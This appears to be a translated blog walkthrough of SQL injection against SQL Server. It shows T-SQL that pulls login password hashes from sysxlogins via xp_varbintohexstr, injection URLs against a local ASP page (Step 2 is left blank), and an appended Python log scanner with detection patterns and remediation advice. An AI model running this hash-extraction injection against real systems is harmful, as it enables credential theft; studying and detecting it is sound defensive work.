The password column in the sysxlogins table is varbinary, so it cannot be retrieved through error messages. Recently I happened to come across an extended stored procedure called xp_varbintohexstr, which gave me an idea:
Core demonstration code (Query Analyzer)
-- Buffers for the hash, the login name and the hex-encoded result
declare @p varbinary(64), @u varchar(16), @s varchar(128);
-- Pick the first login (ordered by name) that has a non-NULL password hash
select top 1 @u = name, @p = password from (select top 1 * from sysxlogins where password is NOT NULL order by name ASC) T order by name DESC;
-- Convert the varbinary hash into a printable hex string
exec xp_varbintohexstr @p, @s OUT;
-- Return login name and hash as a single string
select 'User:' + @u + '/Hash:' + @s;
Theoretical derivation is often tiresome, so here are the test results from my own machine (ASP + SA account, with error messages displayed):
Step.1
http://localhost/inject.asp?id=1;create+table+SQLhash(hash+varchar(2000))--
Step.2
Step.3
http://localhost/inject.asp?id=1+and+(select+top+1+hash+from+SQLhash)=0--
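From the defender's side, an added example that is not part of the original post: a small Python scanner that URL-decodes request query strings from a web log and flags the patterns used in the walkthrough above (a stacked query after `;`, references to sysxlogins or xp_varbintohexstr, a boolean comparison against a subselect, a trailing `--` comment). The log format and every log line are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (IIS-style fields: date time method path query status).
# Lines 2 and 3 reproduce the injected URLs from the walkthrough; the others are benign.
SAMPLE_LOG = """\
2024-01-01 10:00:00 GET /inject.asp id=1 200
2024-01-01 10:00:05 GET /inject.asp id=1;create+table+SQLhash(hash+varchar(2000))-- 500
2024-01-01 10:00:09 GET /inject.asp id=1+and+(select+top+1+hash+from+SQLhash)=0-- 500
2024-01-01 10:00:20 GET /products.asp cat=books 200
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<method>\S+) (?P<path>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

# Indicators are matched against the URL-decoded, lower-cased query string.
INDICATORS = {
    # a second statement chained after ';' (stacked query)
    "stacked_query": re.compile(r";\s*(create|drop|insert|exec|execute|declare|update|delete)\b"),
    # direct reference to the login/hash table
    "sysxlogins_ref": re.compile(r"\bsysxlogins\b"),
    # the extended procedure used to turn varbinary into text
    "varbin_to_hex": re.compile(r"\bxp_varbintohexstr\b"),
    # boolean condition built on a subselect (blind comparison step)
    "blind_compare": re.compile(r"\band\s*\(\s*select\b"),
    # comment sequence used to discard the rest of the original query
    "comment_tail": re.compile(r"--\s*$"),
}


def scan_log(text):
    """Return [(line_no, path, [indicator names])] for lines that match at least one indicator."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected field layout
        decoded = unquote_plus(m["query"]).lower()  # '+' -> space, %xx -> byte
        matched = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if matched:
            hits.append((line_no, m["path"], matched))
    return hits


if __name__ == "__main__":
    for line_no, path, names in scan_log(SAMPLE_LOG):
        print(f"line {line_no} {path}: {', '.join(names)}")
```

Matches on these indicators are a review trigger, not proof of compromise; the structural fixes remain parameterized queries, running the application with a low-privilege login instead of SA, and not exposing database errors to clients.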